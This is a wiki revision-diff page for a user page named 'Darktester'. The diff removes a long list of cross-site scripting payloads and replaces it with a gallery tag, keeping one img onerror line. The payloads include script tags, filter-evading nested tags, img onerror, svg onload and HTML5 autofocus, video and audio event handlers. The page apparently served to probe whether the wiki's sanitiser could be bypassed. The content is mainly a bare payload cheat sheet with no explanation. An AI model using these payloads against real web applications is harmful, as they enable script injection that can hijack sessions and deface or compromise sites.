User:Darktester: Difference between revisions

@@ Line 1: / Line 1: @@
-<script>alert('XSS')</script>
+<gallery>
-<scr<script>ipt>alert('XSS')</scr<script>ipt>
-"><script>alert('XSS')</script>
-"><script>alert(String.fromCharCode(88,83,83))</script>
-Img payload
 <img src=x onerror=alert('XSS');>
-<img src=x onerror=alert('XSS')//
+</gallery>
-<img src=x onerror=alert(String.fromCharCode(88,83,83));>
-<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
-<img src=x:alert(alt) onerror=eval(src) alt=xss>
-"><img src=x onerror=alert('XSS');>
-"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
-Svg payload
-<svg onload=alert(1)>
-<svg/onload=alert('XSS')>
-<svg onload=alert(1)//
-<svg/onload=alert(String.fromCharCode(88,83,83))>
-<svg id=alert(1) onload=eval(id)>
-"><svg/onload=alert(String.fromCharCode(88,83,83))>
-"><svg/onload=alert(/XSS/)
-XSS for HTML5
-<body onload=alert(/XSS/.source)>
-<input autofocus onfocus=alert(1)>
-<select autofocus onfocus=alert(1)>
-<textarea autofocus onfocus=alert(1)>
-<keygen autofocus onfocus=alert(1)>
-<video/poster/onerror=alert(1)>
-<video><source onerror="javascript:alert(1)">
-<video src=_ onloadstart="alert(1)">
-<details/open/ontoggle="alert'1'">
-<audio src onloadstart=alert(1)>
-<marquee onstart=alert(1)>

Revision as of 20:10, 28 May 2018